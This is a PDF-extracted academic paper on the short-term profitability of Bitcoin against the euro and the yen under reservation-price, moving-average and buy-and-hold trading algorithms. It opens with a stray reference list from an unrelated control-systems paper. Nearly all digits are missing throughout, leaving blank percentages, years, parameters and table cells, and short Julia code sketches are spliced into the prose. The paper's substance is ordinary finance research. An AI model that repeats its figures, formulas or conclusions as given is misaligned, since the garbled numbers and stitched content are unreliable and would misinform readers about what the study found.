yu, “finite-time containment control for second-order multiagent systems under directed topology,” ieee trans. circuits syst. ii, exp. briefs, vol. , no. , pp. - , aug. [ ] y. q. wu, b. wang, and g. d. zong, “finite-time tracking controller design for nonholonomic systems with extended chained form,” ieee trans. circuits syst. ii, exp. briefs, vol. , no. , pp. - , nov. [ ] a. polyakov, “nonlinear feedback design for fixed-time stabilization of linear control systems,” ieee trans. autom. control, vol. , no. , pp. - , aug. [ ] e. cruz-zavala, j.a. moreno, and l.m. fridman, “uniform robust exact differentiator,” ieee trans. autom. control, vol. , no. , pp. - , nov. [ ] z. y. zuo, “non-singular fixed-time terminal sliding mode control of non-linear systems,” iet contr. theory appl., vol. , no. , pp. - , apr. [ ] junkang ni, ling liu, member, ieee, chongxin liu, xiaoyu hu and shilei li ieee transactions on circuits and systems-ii: express briefs [ ] b xu.composite learning finite-time control with application to quadrotors.ieee transactions on systems man & cybernetics systems. , pp( ): - . submitted september accepted november published february corresponding author iftikhar ahmad, ia@uetpeshawar.edu.pk academic editor ana reyes-menendez additional information and declarations can be found on page doi . /peerj-cs. copyright ahmad et al. distributed under creative commons cc-by . 
open access using algorithmic trading to analyze short term profitability of bitcoin iftikhar ahmad , muhammad ovais ahmad , , mohammed a. alqarni , abdulwahab ali almazroi and muhammad imran khan khalil department of computer science and information technology, university of engineering & technology peshawar, peshawar, pakistan department of mathematics and computer science, karlstad university, karlstad, sweden m s research unit, university of oulu, oulu, finland university of jeddah, college of computing and information technology at khulais, department of infor- mation technology, jeddah, saudi arabia university of jeddah, college of computer science and engineering, department of software engineering, jeddah, saudi arabia abstract cryptocurrencies such as bitcoin (btc) have seen a surge in value in the recent past and appeared as a useful investment opportunity for traders. however, their short term profitability using algorithmic trading strategies remains unanswered. in this work, we focus on the short term profitability of btc against the euro and the yen for an eight- year period using seven trading algorithms over trading periods of length and days. we use the classical buy and hold (bh) as a benchmark strategy. rather surprisingly, we found that on average, the yen is more profitable than btc and the euro; however the answer also depends on the choice of algorithm. reservation price algorithms result in . % and % of average returns over and days respectively which is the highest for all the algorithms for the three assets. for btc, all algorithms outperform the bh strategy. we also analyze the effect of transaction fee on the profitability of algorithms for btc and observe that for trading period of length no trading strategy is profitable for btc. for trading period of length , only two strategies are profitable. subjects algorithms and analysis of algorithms, data science keywords algorithmic trading, bitcoin, cryptocurrencies introduction cryptocurrencies have seen a surge in the recent past. researchers and investors alike have focused on the growth and evolution of cryptocurrencies like bitcoin (btc), etherum, and litecoin etc. moore ( ) attributed three main factors that contributed towards the rise and adaptation of bitcoins. first, higher profit margins, maintained by credit card agencies for using their platforms has resulted in dis-satisfied customers. the customers are thus lured to use btc, which promises extremely low transaction fee. second, the anonymity that is offered by the bitcoins. bitcoins offer the possibility of conducting transactions using pseudonyms and thus omitting the need of using real names. third is the decentralization of the bitcoin that protects against inflation. over time, btc has become one of the choice currencies for online payment and beside others is accepted by tech-giants like amazon, apple, microsoft, and paypal etc. the introduction of cryptocurrencies provided a new how to cite this article ahmad i, ahmad mo, alqarni ma, almazroi aa, khalil mik. . using algorithmic trading to analyze short term profitability of bitcoin. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:ia@uetpeshawar.edu.pk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. 
investment domain for the investors, and became a credible investment vehicle (brière, oosterlinck & szafarz, ). bitcoin was introduced by satoshi nakamoto in (nakamoto, ). the inventor satoshi nakamoto is a pseudonym and the real identity of the person is not known to the world. bitcoin is a digital currency, i.e., unlike fiat currencies such as dollar, and euro etc., it does not have any physical denomination, and is present only in digital form. beside similarities, such as the price regulation based on demand and supply, there are some key differences between fiat and crypto currencies like btc. for instance, btc has no centralized authority (like the federal reserve) that controls the supply, i.e., btc and by extension all cryptocurrencies are decentralized by nature. the value of a fiat currency is generally dependent on factors such as inflation rate in a country, the interest rates, balance between import and export and monetary policy. in contrast, the value of btc can be determined by several factors such as transactional demand, media speculation, buzz around the technology, and acceptability etc (nguyen, de bodisco & thaver, ; wang & vergne, ). other differentiating aspects include legality, tangibility, and storage. the underlying technology of btc is blockchain. in its simplest form, a blockchain is a distributed append-only ledger formed by the collection of blocks. the append-only nature of the ledger means that transactions once recorded are tempered-proof and cannot be changed/modified in any form. this property is achieved with the help of cryptographic hash functions (narayanan et al., ). the bitcoin eco-system is based on peer-to-peer network where a large number of computational nodes are connected (not necessarily directly). the peer-to-peer network omits the need of centralized system, instead it uses the concept of ‘‘proof-of-work’’ to validate transactions. for a detailed description of btc, its underlying technology and applications, the reader is referred to narayanan et al. ( ). algorithmic trading is an important tool used by investors in financial trading markets (ahmad & schmidt, ). it facilitates investors in investing their wealth in various assets (currencies, bonds, stock shares etc.) by automating the decision making process. a number of algorithms are proposed in the literature for algorithmic trading (iqbal & ahmad, ; mohr, ahmad & schmidt, ; ahmad & schmidt, ; el-yaniv et al., ). the problem is addressed in a wide variety of domains including computer science (kao & tate, ; el-yaniv et al., ; mohr, ahmad & schmidt, ), operations research (schroeder, dochow & schmidt, ), economics and finance (coakley, marzano & nankervis, ; hsu, hsu & kuan, ). these algorithms are based on various assumptions and are designed to optimize a variety of objective functions such as minimizing competitive ratio (mohr, ahmad & schmidt, ). algorithmic trading and technical analysis are also important tools to investigate the market behavior and assess its profitability in the short and long term scenarios (ahmad & schmidt, ; coakley, marzano & nankervis, ). despite the debate in the literature questioning the effectiveness of technical analysis, there is a plethora of research work based on technical analysis (coakley, marzano & nankervis, ; hsu, hsu & kuan, ; menkhoff & taylor, ). the variety of studies validated the usefulness of technical analysis and its wide spread applicability. 
however, to the best of our knowledge, there is no work to evaluate the short term profitability of btc using algorithmic trading ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and technical analysis. we investigate the short term profitability of btc against two other major currencies euro and yen. more specifically, we consider daily exchange rates of dollar–btc, dollar–euro, and dollar-yen from st jan to st dec . we investigate the short term profitability ( and days) as it is a common observation that in the long term btc has observed significant price movement and is highly profitable. we consider two categories of algorithms namely reservation price algorithms and moving average based algorithms and consider buy and hold as a benchmark strategy. our findings are based on the geometric average period return, the effect of transaction fee, the number of buy and sell transactions, the number of completed transactions, and the number of profitable vs. non-profitable transactions. using buy and hold strategy as our benchmark, we compare the geometric average period returns of the seven strategies with buy and hold. rather surprisingly, we found that in short term the yen is more profitable than btc and euro; however the answer also depends on the choice of algorithm. reservation price algorithms result in . % and % of average returns over and days respectively, which is the highest for all algorithms for the three assets. for btc, all algorithms outperform the bh strategy. after introducing a transaction fee of %, we observe that for the trading period of length no trading strategy is profitable for btc, whereas for trading period of length , only two strategies are profitable. it is important to mention that we do not consider machine learning techniques but instead focus on algorithmic trading strategies which do not rely on past trends and patterns, thus do not need future to follow the patterns of the past. machine learning based algorithms are presented in the literature, the reader is referred to uras et al. ( ), alessandretti et al. ( ) and zbikowski ( ) rest of the paper is organized as follows; in ‘literature review’, we briefly present literature review on the use of experimental evaluation of trading algorithms. in ‘research questions and data set’, we present a set of research questions and the methodology for the extraction of data set. in ‘experimental setup and methodology’, we describe the set of algorithms, followed by the description of the evaluation criterion. results are presented in ‘results and discussions’, whereas ‘conclusion’ presents conclusion, and directions for future work. literature review experimental evaluation of trading strategies is an established area of research in computer science (iqbal, ahmad & schmidt, ; ahmad & schmidt, ; mohr, ahmad & schmidt, ), and computational finance (brock, lakonishok & lebaron, ; coakley, marzano & nankervis, ). ever since the seminal work of brock, lakonishok & lebaron ( ) there is a considerable literature devoted to the study of algorithmic trading strategies. the strategies are investigated from different perspectives and for various markets around the world. in the following, we present a brief literature review of the work based on experimental analysis of trading algorithms. iqbal, ahmad & schmidt ( ) performed an experimental evaluation of dax to answer the question ‘‘can online trading algorithms beat the market?’’. the authors ahmad et al. 
( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. considered a number of trading algorithms, and compared their performance with classical buy and hold (bh) algorithm over trading periods of various length. they concluded that trading algorithms can beat the market, i.e., a trading algorithm can achieve a better return (profit) than bh algorithm. ahmad & schmidt ( ) presented an extensive experimental evaluation of trading algorithms for uni-directional conversion problem (see mohr, ahmad & schmidt ( ) for a definition of uni-directional conversion problem). the authors considered two data sets dax and s&p over a period of years ( – , and compared the performance of various algorithms using average competitive ratio. unlike, iqbal, ahmad & schmidt ( ), ahmad & schmidt ( ) used bootstrapping to avoid data snooping bias. coakley, marzano & nankervis ( ) performed a comprehensive analysis of various trading rules for currencies over a period of years. authors reported evidence of profitability for rules based on classical moving average as well as rules based on bollinger bands and relative strength index. jiang, tong & song ( ) investigated the profitability of trading rules in chinese stock market. the authors used years daily data from chinese aggregate market return and confirmed the profitability of trading rules even in the presence of transaction costs. strobel & auer ( ) analyzed the diminishing predictive power of fundamental variables and seasonal effects over time. they considered variable length moving average (vlma) rules introduced by brock, lakonishok & lebaron ( ), and using data set covering to concluded that vlma rules have lost the predictive ability. chang, jong & wang ( ) used vlma rules to taiwanese stock exchange (twse) and computed excess returns to buy and hold (bh) strategy. the objective of the work was to evaluate the effectiveness of vlma rules against bh. the results confirmed the superiority of vlma rules against bh. the novelty of the work lies in the application of vlma rules to all individual stock listed on twse. hsu, taylor & wang ( ) investigated the profitability of technical trading rules in the forex market by analyzing currencies over a period of years. it is argued that there is a significant evidence of the profitability of technical trading rules for some periods. likewise, the profitability variations are consistent with the adaptive market hypothesis. fang, jacobsen & qin ( ) used the technical trading rules of brock, lakonishok & lebaron ( ) and out-of-sample tests based on fresh data. they inferred that there is no conclusive evidence to support the predictive ability of these strategies. however, they attributed the lack of predictive ability to potential bias rather than efficient market hypothesis. despite the plethora of work dedicated to analyze the profitability of various trading strategies and markets, to the best of our knowledge there is no work that compares the profitability of bitcoin with various other currencies, and to evaluate the performance of various algorithms on bitcoin. research questions and data set research questions we formulate a set of research questions (rq), which essentially provide a base for the data analysis. the main objectives of the research questions are to identify the most profitable ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
asset, the most appropriate (profitable) algorithm for various assets, and to analyze the effect of transaction cost on the profitability of various algorithms. rq . which asset is the most profitable in terms of geometric average period returns? rq . which strategy is the most profitable for each of the assets? rq . how the number of buy and sell signals vary for btc? rq . what are the number of positive and negative returned transactions for btc? rq . how the transaction fee effects the profitability of algorithms? note that the research questions are not arbitrarily but are instead rooted in the literature. for instance, rq is based on hsu, taylor & wang ( ) who used japanese yen, german mark/euro, u.k. pound, and swiss franc as base currency in their study and evaluated the profitability of technical trading rules. likewise, rq is variant of research question posed in abbey & doukas ( ). in abbey & doukas ( ) the authors examined if technical trading rules can be profitable for individual traders. in the similar manner, rq is studied by a number of researchers including hsu, taylor & wang ( ) and ahmad & schmidt ( ). data we consider the daily closing prices of the following currencies against dollar; i bitcoin (btc) ii euro iii yen a single data point represents the amount of currency that can be purchased by spending us. the btc data is obtained from coindesk website (http://www.coindesk.com) for a period of years starting from jan to dec . the main reason for the selection of the data set is based on the availability of the data. on many websites such as coindesk, usd-btc data is only available from july , therefore, we select the starting date to be jan , and in the process data set consists of complete years. euro and yen data is obtained from yahoo! finance (http://finance.yahoo.com). table reports various statistics for the data. for the sake of comparison, we take a holistic view of the whole data set by reporting the statistics for the years ( jan – dec ). experimental setup and methodology trading algorithms a variety of trading algorithms are proposed in the literature (mohr, ahmad & schmidt, ; coakley, marzano & nankervis, ). in the following we describe a selected set of algorithms that are used in our study. the motivation behind the selection of the algorithms from the literature is rooted in the performance of the algorithms. studies (ahmad & schmidt, ; iqbal, ahmad & schmidt, ; iqbal, ahmad & shah, ) have shown that reservation algorithm of el-yaniv et al. ( ) and iqbal, ahmad & shah ( ) are the best performing algorithms. further, in order to make the comparison meaningful, two widely used techniques from finance namely variable length moving average, and fixed length moving average are also considered. ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.coindesk.com) http://finance.yahoo.com http://dx.doi.org/ . /peerj-cs. table summary statistics of the dataset, σ =standard deviation, γ =skewness, k =kurtosis, ρ(k)=kth order correlation. asset bitcoin euro yen observations minimum . . . maximum . . . mean . . . σ . . . γ . . − . std error of γ . . . k . − . − . std error of k . . . ρ( ) . . . ρ( ) . . . ρ( ) . . . ρ( ) . . . ρ( ) . . . ρ( ) . . . ρ( ) . . . reservation price algorithms reservation price algorithm calculates a threshold price and generates a buy signal when the offered exchange rate is less than or equal to the threshold. 
a sell signal is generated when the price is at least threshold (iqbal, ahmad & schmidt, ; iqbal, ahmad & shah, ; kao & tate, ). a number of reservation price algorithms are presented in the literature (mohr, ahmad & schmidt, ; kao & tate, ; iqbal, ahmad & shah, ; el-yaniv et al., ). in the following we present the selected set of reservation price algorithms considered for our study. el-yaniv et al. ( ) assumed a priori information about the lower (minimum possible price m) and upper (maximum possible price m) bound of prices, and presented a reservation price algorithm. let et be the current exchange price. algorithm provides formal description for el-yaniv reservation price algorithm for generating buy and sell signals respectively. iqbal, ahmad & shah ( ) presented a modified version of the reservation price policy of el-yaniv et al. ( ). the authors critiqued the assumption of fixed values of m and m and argued that inter-day price fluctuation is not arbitrary but is instead governed by inter-day price fluctuation function as shown in eq ( ). ( −γ)et− ≤et ≤( +γ)et− ( ) note that et is the exchange rate offered on day t, and γ ∈ , . the formal description of algorithm is given in algorithm . for detailed working of the algorithm, the reader is referred to iqbal, ahmad & shah ( ). kao & tate ( ) presented a reservation price algorithm based on the perceived rank of the offered exchange rate. the perceived exchange rank is calculated based on the current ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm reservation price algorithm (rp) require: et,m,m : calculate reservation price e∗= √ mm : if et ≤e∗ then : generate a buy signal : end if : if et >e∗ then : generate a sell signal : end if : generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. algorithm reservation price algorithm rp∗ require: m, m,γ,t : set m =m,m =m : for t= to t do : a new exchange rate et is observed. : compute achievable lower bound mt : mt =max{mt− ,et ( −γ)t−t} : compute achievable upper bound mt : mt =min{mt− ,et ( +γ)t−t} : calculate new reservation price e∗t = √ mt mt : if et ≤e∗t then : generate a buy signal : end if : if et >e∗t then : generate a sell signal : end if : end for : generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. rank xt of the offered exchange rate et in all the exchange prices observed so far. the formal algorithm is presented in algorithm . t represents the number of days in a trading period, lt (t) and ht (t) are the thresholds for buy and sell signals respectively and are computed as shown in eqs. ( ) and ( ) respectively; lt (t)=   : t =t⌊ t+ t+ (rt (t+ )−pt (t+ )) ⌋ : t <t ( ) ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm reservation price algorithm (kt) require: et,lt (t),ht (t) calculate lt (t) calculate ht (t) generate a buy signal at exchange rate et if xt ≤lt (t) generate a sell signal at exchange rate et if xt ≥ht (t) generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. note that pt (t) is the expected difference between the buy and sell prices if the optimal strategy is followed at t, and is calculated as shown in eq. ( ). 
pt (t)=   : t =t pt (t+ )+ lt (t) t ( rt (t+ )−pt (t+ )− t+ t+ lt (t)+ ) : t <t ( ) ht (t)= ⌈ t+ t+ rt (t+ ) ⌉ ( ) note that rt is the expected final rank of et for selling, if an optimal strategy is followed starting from time t, and is calculated as given in eq. ( ). rt (t)= ht (t)− t ( rt (t+ )− t+ (t+ ) ht (t) ) + t+ . ( ) moving average based rules moving average (ma) rule is the simplest and popular technical analysis trading rule. the basic idea of ma based rules is to generate buy and sell signals based on the short vs long-term moving averages. more specifically, a buy signal is generated when the short term moving average cuts the long term moving average from below. on the contrary, a sell signal is generated when the short-term moving average cuts the long-term moving average from above. however, in a market the crossing between short-term and long-term moving averages can occur on multiple instances in a short period, resulting in a large number of buy and sell signals (zhu et al., ). the resulting large number of signals are hardly profitable and can force a large transaction fee as well. to avoid this, a minimum threshold called band is introduced. the band introduces a specific percentage difference between the short and long term moving averages in order to generate buy and sell signals. in the literature two variants of the moving averages, called variable length moving average (vlma) and fixed length moving average (flma) are used (brock, lakonishok & lebaron, ; gunasekarage & power, ; zhu et al., ). let as be the short term moving average, al be the long term moving average, and b the band value. algorithm describes variable length moving average strategy for buy and sell signals. in vlma a buy signal is generated when the short term moving average cuts the long term moving average (taking into account the band value) from below, i.e., as >( +b)al. ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm variable length moving average algorithm require: as,al,b : if as >( +b)al then : generate a buy signal : end if : if as <( −b)al then : generate a sell signal : end if : generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. likewise, vlma generates a sell signal when as < ( −b)al. a rule is represented by the combination of three values s (length of short-term moving average), l (length of long-term moving average), b (band). for instance, vlma( , , . ) represents a rule where short term average is taken over a period of days, long term over a period of days, and the band value is %. flma works on the same principle as stated in algorithm . however, flma differs from the vlma by introducing a holding period, i.e., once a signal is generated then the position must be held for a fixed number of days. any signal generated during the holding period is ignored. buy and hold strategy buy and hold (bh) is widely used in the literature as a benchmark strategy (mohr, ahmad & schmidt, ; chang, jong & wang, ; baur et al., ), and is therefore used in our study as well. in bh an investor executes the buy transaction on the first day of the investment period and holds the position until the last day t . on the last day, a sell transaction is executed to complete the trading. the formal description of buy and sell signals of bh algorithm is given in algorithm . 
algorithm buy and hold (bh) require: e ,et : buy on the first offered exchange rate e : sell on the last offered exchange rate et we test the profitability of the algorithms for various parameters and for various durations. we consider short term moving averages over and days, long term moving averages over , and days, and band values . and . (brock, lakonishok & lebaron, ; fang, jacobsen & qin, ). thus we produce a total of trading rules, each for vlma and flma. likewise, we consider and days durations for algorithms , , and . thus we have a total of variants of algorithms to evaluate. table presents a summary of the selected algorithms and their variants. evaluation criterion we use geometric average trading period return (gpr) as our evaluation criterion. gpr is used as an evaluation criterion in a number of works such as schmidt, mohr & kersch ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table summary of the selected algorithms and their variants. s.no algorithm description vlma( , , . ) vlma algorithm with s,l,b values as , , . vlma( , , . ) vlma algorithm with s,l,b values as , , . flma( , , . ) flma algorithm with s,l,b values as , , . flma( , , . ) flma algorithm with s,l,b values as , , . rp( ) reservation price algorithm (rp) (el-yaniv et al., ) applied over days rp∗( ) update reservation price algorithm (rp∗) (iqbal, ahmad & shah, ) applied over days kt( ) reservation price algorithm (kt) (kao & tate, ) applied over days bh( ) buy and hold algorithm applied over days vlma( , , . ) vlma algorithm with s,l,b values as , , . vlma( , , . ) vlma algorithm with s,l,b values as , , . flma( , , . ) flma algorithm with s,l,b values as , , . flma( , , . ) flma algorithm with s,l,b values as , , . rp( ) reservation price algorithm (rp) (el-yaniv et al., ) applied over days rp∗( ) update reservation price algorithm (rp∗) (iqbal, ahmad & shah, ) applied over days kt( ) reservation price algorithm (kt) (kao & tate, ) applied over days bh( ) buy and hold algorithm applied over days ( ) and iqbal, ahmad & schmidt ( ). let dj be the initial amount of dollars at the start of a trading period j, and djt be the final amount of dollars at the end of the trading period j. let, rj be the return of the jth trading period, then rj =d j t/d j . assuming that there are p trading periods (or trades), we define the geometric average trading period return gpr(p) as; gpr(p)= ( p∏ i= ri ) /p ( ) initially we do not consider any transaction fee and report our findings based on zero transaction fee. in ‘how the transaction fee effect the profitablity of algorithms?’, we assess the impact of the transaction fee on the returns by introducing various values of transaction fees. the transaction fees are based on coinbase—one of the popular online services dealing in buying, selling and storage of bitcoins. coinbase charges a minimum of . % transaction fee on all transactions. however, the exact value varies based on the mode of payment. for instance, for payment via credit card the transaction fee is . %. we consider a set of transaction fees tf ={ , . , . }. we compare the geometric average period returns of the strategies (see table ). it is also important to mention that returns are only calculated for trading periods when at least one buy transaction is followed by a sell transaction. for situations, where only buy or only sell signals are generated, no returns are taken into account. ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. 
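before turning to the results, the quantities just defined can be summarised in a few lines of julia. the function names and argument conventions below are an illustrative sketch, not the authors' implementation, and the forced sell on the last trading day of a period is omitted.

# rp: reservation price computed from the assumed global lower/upper price
# bounds m and M; buy while the offered rate is at most e*, sell once it is above.
rp_threshold(m, M) = sqrt(m * M)

# rp*: the bounds are tightened on every day t of a T-day period using the
# inter-day fluctuation bound (1 - γ)e_{t-1} <= e_t <= (1 + γ)e_{t-1}.
function rpstar_threshold(m_prev, M_prev, e_t, γ, T, t)
    m_t = max(m_prev, e_t * (1 - γ)^(T - t))   # achievable lower bound
    M_t = min(M_prev, e_t * (1 + γ)^(T - t))   # achievable upper bound
    return sqrt(m_t * M_t), m_t, M_t
end

# geometric average trading-period return over p completed periods:
# gpr(p) = (r_1 * r_2 * ... * r_p)^(1/p), where r_j = D_T^j / D_0^j.
gpr(returns) = prod(returns)^(1 / length(returns))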
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. table geometric average trading period returns (gpr) of trading strategies. strategy bitcoin euro yen vlma( , , . ) . . . vlma( , , . ) . . . flma( , , . ) . . . flma( , , . ) . . . rp( ) . . . rp∗( ) . . . kt( ) . . . bh( ) . . . vlma( , , . ) . . . vlma( , , . ) . . . flma( , , . ) . . . flma( , , . ) . . . rp( ) . . . rp∗( ) . . . kt( ) . . . bh( ) . . . average gpr . . . results and discussions in the following, we present our results from various perspectives such as the geometric average trading period returns, the number of buy/sell signals generated and the impact of the transaction fee. which asset is the most profitable in terms of geometric average period return? we calculate geometric average trading period return for each trading rule based on eq. ( ) and report our findings as shown in table . it must be noted that we do not consider any transaction fee in this case. the effect of the transaction fee is discussed later in ‘how the transaction fee effect the profitablity of algorithms?’ it can be seen from the resultant table that the average gpr of the selected assets are . , . , and . for btc, euro and yen respectively. although the difference between gpr is not significant, yen achieved a higher return than btc, and euro. a further analysis of the data reflects that the returns are strategy dependent as well. for instance, rp∗( ) achieved an gpr of . over btc which is the highest returns among all the assets/strategies. another interesting observation is the number of resultant positive and negative returns. note that an gpr of at least is termed as a positive return. for btc, out of strategies, are positive. for euro and yen, the corresponding number of positive returns strategies are and respectively. comparing the performance of reservation price algorithms (rp, rp∗, kt), and moving average based strategies (vlma, flma) with bh, we found that for btc, the returns of all algorithms are superior than corresponding bh strategies. the same trend is observed ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table highest gpr achieved for the assets. asset trading period gpr algorithm btc . rp∗ btc . rp∗ euro . vlma( , , . ) euro . vlma( , , . ) yen . flma( , , . ) yen . flma( , , . ) for euro except for kt( ) which is inferior to bh( ). all algorithms outperform bh on yen as well, except kt . which strategy is the most profitable for each of the assets? to answer the question, we analyze table , and identify the best performing algorithm for each asset. we also consider the trading period length, and summarize the results in table . we observed that rp∗ is the best algorithm for btc achieving a gpr of . and . for trading period of length and respectively. for euro, the corresponding algorithms are vlma( , , . ) and vlma( , , . ) resulting in an average gpr of . and . respectively. flma( , , . ) and flma( , , . ) are the best performing algorithms for yen with average gpr of . and . respectively. it is interesting to note that for each asset, a unique algorithm is adjudicated as the best performing algorithm. further, analysis reveals that kt and bh are the worst performing algorithms for all the three data sets. for btc, the two algorithms’ returns are negative (< ). for euro, the returns of kt and bh are positive (though worst among all), and for yen the returns are positive except for kt( ) which is marginally less than . on average, vlma( , , . 
) is the best performing algorithm over all asset by achieving an average gpr of . which is closely followed by flma( , , . ). it is interesting to point out that although rp and rp∗ assumes apriori information about the lower and upper bounds of future exchange rates, their average performance is inferior to that of vlma and flma. in order to ensure that the performance of algorithms on btc is not an anomaly, a statistical t-test (paired sample t-test) was performed with confidence level of % (p≤ . ). the tests were performed on the returns of algorithms for btc considering and days trading duration. tables and summarizes the results of paired t-test for the returns of btc on various algorithms for and days trading periods. recall from table that rp∗ is the best performing algorithm for btc. table confirms that with % confidence the improved performance of rp∗ over all algorithms (except vlma( , , . ), and flma( , , . )) is not by chance. for vlma( , , . ), and flma( , , . ) the confidence level is still significant ( % and %). other than rp∗, and rp no other algorithm exhibits a significant confidence in the returns over btc. however, except for flma( , , . ) and kt( ) all other algorithms have shown the potential to beat the market, i.e., the returns are better (and statistically significant) than bh strategy. for days trading period, the returns of moving average based strategies ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table paired sample t-test for the returns of btc with confidence interval of % ( days trading period). algorithms vlma( , , . ) flma( , , . ) flma( , , . ) rp( ) rp∗( ) kt( ) bh( ) vlma( , , . ) . . . . . . . vlma( , , . ) – . . . . . . flma( , , . ) – – . . . . . flma( , , . ) – – – . . . . rp( ) – – – – rp∗( ) – – – – – kt( ) – – – – – – . table paired sample t-test for the returns of btc with confidence interval of % ( days trading period). algorithms vlma( , , . ) flma( , , . ) flma( , , . ) rp( ) rp∗( ) kt( ) bh( ) vlma( , , . ) . . . . . . . vlma( , , . ) – . . . . . . flma( , , . ) – – . . . . . flma( , , . ) – – – . . . . rp( ) – – – – . rp∗( ) – – – – – kt( ) – – – – – – . are statistically significant than bh only (see table ), whereas rp∗ achieves statistically significant returns than rp, kt , and bh only. how the number of buy and sell signals vary for btc? we record the number of buy and sell signals, as well as the number of completed transactions. a transaction is completed when for a buy signal the corresponding sell transaction occurs. figure summarizes the number of buy, sell and completed transactions. we observed that considering days trading period for btc, vlma and flma based strategies resulted in % completed transactions. vlma generates % more buy and sell signals than flma. this is logical as vlma based strategies do not have any holding period and are free to generate a signal if the corresponding criterion is met. for reservation price algorithms, the number of completed transactions are in the range of − %. buy and hold has the highest number of completed transactions as it does not generate buy and sell signals based on some predefined criterion, but instead buys on the first trading day and sells on the last trading day irrespective of the offered exchange rate. for trading period of length days, the same trend is observed for vlma and flma based strategies. 
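the buy and sell counts discussed above are produced by the moving-average crossover test; for concreteness, a minimal julia sketch of the vlma decision for a single day is given below. the helper name, the default parameter values and the :buy/:sell/:none encoding are illustrative only, and the flma variant, which additionally enforces a fixed holding period, is omitted.

# simple moving average of the last n prices ending at day t (assumes t >= n)
sma(prices, n, t) = sum(prices[t-n+1:t]) / n

# vlma(s, l, b): buy when the short average exceeds the long average by more
# than the band b, sell when it falls below it by more than the band.
function vlma_signal(prices, t; s = 5, l = 20, b = 0.01)
    a_s = sma(prices, s, t)
    a_l = sma(prices, l, t)
    a_s > (1 + b) * a_l && return :buy
    a_s < (1 - b) * a_l && return :sell
    return :none
end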
our analysis of the data reveals that for vlma, on average, % of the buy transactions remain open, whereas the corresponding number for the sell signals is %. likewise, the percentages of open buy and sell signals for flma are % and % only. for the reservation price algorithms, the number of completed transactions is reduced to − %.

figure : number of buy and sell signals and completed transactions for btc (per algorithm: buy signals, sell signals, completed transactions).

what are the numbers of positive and negative returned transactions for btc?
we investigate completed transactions from the perspective of positive vs negative returns for btc. we define a transaction to yield positive returns if the sell price is higher than the buy price, i.e., rj > , where rj represents the return of trading period j. for the days trading period, we observe that the vlma and flma based strategies have a higher percentage (> %) of negative returned transactions. for the reservation price policies, kt has more negative transactions (> %), whereas rp and rp∗ have more positive transactions: rp has . % and rp∗ has positive returned transactions. bh has % positive returned transactions. the worst rate of positive returned transactions is observed for kt ( %). for the trading duration of days, rather surprisingly, the percentage of positive returned transactions increased slightly for vlma, flma and kt, whereas a reduction is observed for rp and rp∗. figure is a graphical summary of the positive and negative returned transactions for btc.

figure : positive vs negative returned transactions (percentage of negative and positive transactions per algorithm).

how does the transaction fee affect the profitability of algorithms?
the transaction fee can be a vital factor in the profitability of any trading algorithm. we consider a transaction fee tf = { %, %, %} and calculate gpr to find the effect on profitability. figure is a graphical representation of the effect of the transaction fee on the gpr of the algorithms for btc. we observed an average reduction of . % and . % in the gpr of the algorithms when transaction fees of % and % are levied. introducing a transaction fee of % reduced the positive returned strategies from to only, which are further reduced to (rp and rp∗) when the transaction fee is increased to %. for the euro, the profitability is severely reduced from to strategies when the transaction fee of % is introduced. rather interestingly, for the yen the introduction of the transaction fee reduces the number of profitable strategies from to after the introduction of a % transaction fee; however, there is no change in the number of profitable strategies when the transaction fee is increased to %. for the yen, the four profitable strategies are vlma ( , , . ), flma ( , , . ), vlma ( , , . ), and flma ( , , . ). this also reflects that for variable length moving average strategies to be profitable the band value is vital; for smaller band values, the strategies might not be profitable.

figure : the effect of the transaction fee on the gpr of btc (average period return per algorithm for the three transaction fee levels).

conclusion
we evaluated the short term profitability of btc over a set of reservation price and moving average based algorithms against the euro and the yen for a period of years. based on the average gpr, btc seems a less profitable venture than the yen; however, a deeper analysis revealed that the answer to the profitability question is strategy dependent as well. rp∗ achieved an average gpr of % for a trading period of days, which is the maximum return obtained by any trading algorithm among the three assets. this confirms btc as an attractive opportunity for short term investment. our analysis also revealed that rp and rp∗ are the best performing algorithms on btc, whereas moving average based algorithms return higher profits for the euro and the yen. it is also shown that the selected set of algorithms beat the buy and hold approach, except on the yen where the returns of kt are less than those of buy and hold. further, we highlighted that the returns of all the selected algorithms became negative except for rp and rp∗ when a transaction fee of % was introduced; increasing the transaction fee to % resulted in positive returns for rp and rp∗ on the days investment horizon, and for all other algorithms and their variants the returns were negative for a transaction fee of %. to the best of our knowledge, this study is the first of its kind to evaluate the profitability of btc using a set of trading algorithms and against fiat currencies. future work can include finding an optimized portfolio of fiat and crypto-currencies for short and long term investment.

additional information and declarations
funding: the authors received no funding for this work.
competing interests: the authors declare there are no competing interests.
author contributions:
• iftikhar ahmad conceived and designed the experiments, performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
